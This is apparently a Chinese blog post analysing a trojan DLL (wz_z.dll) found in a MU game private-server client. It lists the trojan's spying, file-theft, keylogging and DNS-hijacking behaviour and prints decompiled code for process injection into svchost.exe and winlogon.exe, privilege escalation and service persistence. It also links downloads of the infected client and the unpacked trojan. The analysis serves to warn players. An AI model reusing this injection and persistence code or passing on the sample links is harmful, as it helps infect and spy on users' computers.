很多年没玩游戏了,近期无意中发现,近20年前玩过的奇迹游戏,现在竟然还比较火。所以下载下来再玩下吧,没成想杀毒软件报客户端里有木马,遂脱壳逆向分析后,记录如下:
警告:客户端中包含木马文件,脱壳后的木马DLL中包含木马代码,杀毒软件会检测出来。为确保您的电脑安全,请将下载的文件放到虚拟机中或其它虚拟环境运行及分析。
木马文件名:wz_z.dll
客户端样例下载:
https://igcn.mu10.com/down.php
脱壳后的木马DLL下载:
链接: https://pan.baidu.com/s/1aisnv01tjbq-K1cgQ2D2QQ 提取码: g2f8
木马行为:
+远程监控用户屏幕及桌面
+上传下载文件
+窃取用户文件及信息
+记录用户鼠标及键盘事件
+感染用户DNS,使用户无法打开例如百度搜索等网站
+使用户成为肉鸡
+等等其它有害行为
wz_z.dll木马逆向代码(部分):
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
hModule = hinstDLL;
if ( fdwReason == 1 && dword_1003055C < 1 )
{
++dword_1003055C;
CreateThread(0, 0, StartAddress, 0, 0, 0);
}
return 1;
}char __cdecl StartServer(CHAR *Src)
{
HDESK v2[4]; // [esp+4h] [ebp-2DCh] BYREF
HDESK v3[4]; // [esp+14h] [ebp-2CCh] BYREF
struct WSAData WSAData; // [esp+24h] [ebp-2BCh] BYREF
char v5[296]; // [esp+1B4h] [ebp-12Ch] BYREFTrojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v3);
Trojan_GetUserDesktopAccess(v2);
CreateMutexA(0, 0, Name);
if ( !WSAStartup(0x202u, &WSAData) )
{
sub_1000A970(v5);
sub_1000A7A0(Src + 256);
sub_1000D990(Src);
while ( 1 )
Sleep(0x3E8u);
}
Trojan_SetProcessWindowStation(v2);
Trojan_SetProcessWindowStation(v3);
return 0;
}BOOL __stdcall EnumFunc(HWND hWnd, _DWORD *a2)
{
BOOL result; // eax
CHAR ClassName[100]; // [esp+8h] [ebp-68h] BYREFGetClassNameA(hWnd, ClassName, 100);
result = _mbscmp((const unsigned __int8 *)ClassName, "Internet Explorer_Server");
if ( result )
return 1;
*a2 = hWnd;
return result;
}char DownCtrlAltDel()
{
char v1[16]; // [esp+0h] [ebp-20h] BYREF
char v2[16]; // [esp+10h] [ebp-10h] BYREFTrojan_SetThreadDesktop_Entry(v1, "Winlogon");
Trojan_SetThreadDesktop_Entry(v2, "Winlogon");
PostMessageA(HWND_BROADCAST, 0x312u, 0, 3014659);
Trojan_SetProcessWindowStation((int)v2);
Trojan_SetProcessWindowStation((int)v1);
return 1;
}char __cdecl WaitServer(void *Src)
{
HDESK v2[4]; // [esp+0h] [ebp-20h] BYREF
HDESK v3[4]; // [esp+10h] [ebp-10h] BYREFTrojan_GetUserDesktopAccess(v2);
Trojan_GetUserDesktopAccess(v3);
Trojan_CopyFile(Src, 0, 1);
Trojan_SetProcessWindowStation((int)v3);
Trojan_SetProcessWindowStation((int)v2);
return 0;
}int __cdecl Trojan_Inject_Entry(DWORD dwProcessId, const void *a2, const char *a3)
{
HMODULE ModuleHandleA; // edi
int v5[4]; // [esp+Ch] [ebp-448h] BYREF
CHAR Filename[260]; // [esp+1Ch] [ebp-438h] BYREF
char v7[260]; // [esp+120h] [ebp-334h] BYREF
char v8[556]; // [esp+224h] [ebp-230h] BYREFModuleHandleA = GetModuleHandleA("kernel32.dll");
v5[1] = (int)GetProcAddress(ModuleHandleA, "GetProcAddress");
v5[0] = (int)GetProcAddress(ModuleHandleA, "LoadLibraryA");
v5[2] = (int)GetProcAddress(ModuleHandleA, "FreeLibrary");
strcpy(v7, a3);
GetModuleFileNameA(hModule, Filename, 0x104u);
qmemcpy(v8, a2, sizeof(v8));
return Trojan_Inject(dwProcessId, sub_100067B0, 0x800u, v5, 0x444u, 0x3E8u);
}char Trojan_Inject_SysCritical()
{
const CHAR *v0; // eax
DWORD v1; // esi
DWORD v2; // eax
const CHAR *v3; // eax
HDESK v5[4]; // [esp+10h] [ebp-524h] BYREF
HDESK v6[4]; // [esp+20h] [ebp-514h] BYREF
void *v7; // [esp+30h] [ebp-504h] BYREF
int v8; // [esp+34h] [ebp-500h]
int v9; // [esp+38h] [ebp-4FCh]
CHAR String1[556]; // [esp+40h] [ebp-4F4h] BYREF
int v11[89]; // [esp+26Ch] [ebp-2C8h] BYREF
char v12[200]; // [esp+3D0h] [ebp-164h] BYREF
char v13[112]; // [esp+498h] [ebp-9Ch] BYREF
LPCSTR lpString2[5]; // [esp+508h] [ebp-2Ch] BYREF
unsigned int v15; // [esp+51Ch] [ebp-18h]
int v16; // [esp+530h] [ebp-4h]Trojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v6);
v16 = 0;
Trojan_GetUserDesktopAccess(v5);
LOBYTE(v16) = 1;
sub_10008060((int)v13);
v0 = lpString2[0];
LOBYTE(v16) = 2;
if ( v15 < 0x10 )
v0 = (const CHAR *)lpString2;
lstrcpyA(::String1, v0);
sub_10009C70(v11);
sprintf(Name, "Wait_%s", v12);
sprintf(aVipshellEventS, "Start_Wait_%s", v12);
sprintf(aVipshellEventS_0, "StopWait_%s", v12);
CreateMutexA(0, 0, Name);
if ( GetLastError() != 183 )
{
do
v1 = Trojan_FindProcessWithExeName("winlogon.exe");
while ( !v1 );
v7 = 0;
v8 = 0;
v9 = 0;
LOBYTE(v16) = 3;
sub_10009E40(&v7);
FindWindowA("Notepad", 0);
v2 = Trojan_FindProcessWithExeName("svchost.exe");
Trojan_Inject_Entry(v2, (int)v11, (int)"StartServer");
v3 = lpString2[0];
if ( v15 < 0x10 )
v3 = (const CHAR *)lpString2;
lstrcpyA(String1, v3);
Trojan_Inject_Entry(v1, (int)String1, (int)"WaitServer");
if ( v7 )
operator delete(v7);
v7 = 0;
v8 = 0;
v9 = 0;
}
LOBYTE(v16) = 1;
sub_10007A20(v13);
LOBYTE(v16) = 0;
Trojan_SetProcessWindowStation((int)v5);
v16 = -1;
Trojan_SetProcessWindowStation((int)v6);
return 0;
}HDESK *__thiscall Trojan_ScreenControl(HDESK *this)
{
sub_10001E80();
*this = (HDESK)&CScreenControlProc::`vftable';
sub_10004E50(this + 3);
Trojan_GetUserDesktopAccess(this + 16);
this[15] = (HDESK)GetTickCount();
return this;
}int __cdecl Trojan_CopyFile(char *Src, LPCSTR lpServiceName, int a3)
{
..................Omitted here............................
if ( lpServiceName )
{
sub_10008060();
v36 = 0;
sub_10007DC0((char *)lpExistingFileName, Src, strlen(Src));
sub_100083B0(lpNewFileName, (int)v23, "wins");
LOBYTE(v36) = 1;
sub_10007BB0((int)lpNewFileName, (void *)"svchost.exe", 0xBu);
v4 = lpNewFileName[0];
if ( v30 < 0x10 )
v4 = (const CHAR *)lpNewFileName;
v5 = lpExistingFileName[0];
if ( v26 < 0x10 )
v5 = (const CHAR *)lpExistingFileName;
CopyFileA(v5, v4, 0);
v6 = lpNewFileName[0];
if ( v30 < 0x10 )
v6 = (const CHAR *)lpNewFileName;
Trojan_ChangeServiceConfig(lpServiceName, v6);
if ( !(_BYTE)a3 )
{
v7 = lpNewFileName[0];
if ( v30 < 0x10 )
v7 = (const CHAR *)lpNewFileName;
DeleteFileA(v7);
}
sub_100083B0(lpFileName, (int)v23, "ShellExt");
LOBYTE(v36) = 2;
sub_10007BB0((int)lpFileName, "lsass.exe", 9u);
..................Omitted here............................
sub_10007BB0((int)v27, (void *)"svchost.exe", 0xBu);
v16 = v27[0];
if ( v28 < 0x10 )
v16 = (const CHAR *)v27;
v17 = lpExistingFileName[0];
if ( v26 < 0x10 )
v17 = (const CHAR *)lpExistingFileName;
CopyFileA(v17, v16, 0);
if ( (_BYTE)a3 )
{
v18 = (LPCSTR *)v27[0];
if ( v28 < 0x10 )
v18 = v27;
sub_10007EC0(v18, 0);
}
else
{
sub_10007EC0((void *)Dependencies, 0);
v19 = v27[0];
if ( v28 < 0x10 )
v19 = (const CHAR *)v27;
DeleteFileA(v19);
}
if ( v28 >= 0x10 )
operator delete((void *)v27[0]);
v28 = 15;
v27[4] = 0;
LOBYTE(v27[0]) = 0;
if ( v35 >= 0x10 )
operator delete((void *)v33[0]);
v35 = 15;
v34 = 0;
LOBYTE(v33[0]) = 0;
if ( v32 >= 0x10 )
operator delete((void *)lpFileName[0]);
v32 = 15;
lpFileName[4] = 0;
LOBYTE(lpFileName[0]) = 0;
if ( v30 >= 0x10 )
operator delete((void *)lpNewFileName[0]);
v30 = 15;
lpNewFileName[4] = 0;
LOBYTE(lpNewFileName[0]) = 0;
v36 = -1;
return sub_10007A20();
}
else
{
result = sub_10009C70(v20);
if ( (_BYTE)result )
return Trojan_CopyFile(Src, ServiceName, a3);
}
return result;
}小结:
大家在闲暇之余,玩玩游戏,放松一下,也是一件美好的事情。但在玩游戏的同时,还是要注意计算机的安全。
